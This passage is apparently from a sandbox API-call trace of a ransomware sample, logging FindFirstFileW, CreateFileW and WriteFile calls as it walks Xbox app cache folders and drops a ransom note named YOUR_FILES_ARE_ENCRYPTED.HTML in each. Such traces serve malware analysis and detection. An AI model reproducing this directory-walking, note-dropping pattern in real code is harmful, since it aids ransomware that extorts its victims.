dwReserved1=0x311b070, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.796] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 1 [0120.796] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 0 [0120.797] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.797] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0120.797] GetProcessHeap () returned 0x600000 [0120.797] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.798] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.798] CloseHandle (hObject=0x31c) returned 1 [0120.798] GetProcessHeap () returned 0x600000 [0120.799] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.799] GetProcessHeap () returned 0x600000 [0120.799] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.799] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.799] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.799] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies") returned 95 [0120.799] GetProcessHeap () returned 0x600000 [0120.799] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.799] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies" [0120.799] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0120.799] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.799] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 1 [0120.799] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 0 [0120.799] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.799] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0120.799] GetProcessHeap () returned 0x600000 [0120.799] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.800] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.801] CloseHandle (hObject=0x31c) returned 1 [0120.801] GetProcessHeap () returned 0x600000 [0120.801] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.801] GetProcessHeap () returned 0x600000 [0120.801] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.802] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.802] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.802] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory") returned 95 [0120.802] GetProcessHeap () returned 0x600000 [0120.802] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.803] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory" [0120.803] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0120.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.803] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 1 [0120.803] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 0 [0120.803] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.803] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0120.803] GetProcessHeap () returned 0x600000 [0120.803] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.804] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.805] CloseHandle (hObject=0x31c) returned 1 [0120.805] GetProcessHeap () returned 0x600000 [0120.805] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.805] GetProcessHeap () returned 0x600000 [0120.805] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.805] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.805] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.805] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp") returned 88 [0120.805] GetProcessHeap () returned 0x600000 [0120.805] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.805] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp" [0120.805] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\*" [0120.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName=".", cAlternateFileName="")) returned 0x626878 [0120.805] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 1 [0120.805] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ee30, dwReserved1=0x311b070, cFileName="..", cAlternateFileName="")) returned 0 [0120.806] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0120.806] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0120.806] GetProcessHeap () returned 0x600000 [0120.806] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.806] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.807] CloseHandle (hObject=0x31c) returned 1 [0120.807] GetProcessHeap () returned 0x600000 [0120.807] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.807] GetProcessHeap () returned 0x600000 [0120.807] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.807] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x616c9ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x616c9ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x616c9ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.807] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.807] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0120.807] GetProcessHeap () returned 0x600000 [0120.807] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.808] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.809] CloseHandle (hObject=0x324) returned 1 [0120.810] GetProcessHeap () returned 0x600000 [0120.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.810] GetProcessHeap () returned 0x600000 [0120.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.811] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.811] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.811] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData") returned 88 [0120.811] GetProcessHeap () returned 0x600000 [0120.811] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.812] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData" [0120.812] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\*" [0120.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x626838 [0120.812] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0120.812] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 0 [0120.812] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0120.812] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0120.812] GetProcessHeap () returned 0x600000 [0120.812] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.813] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, 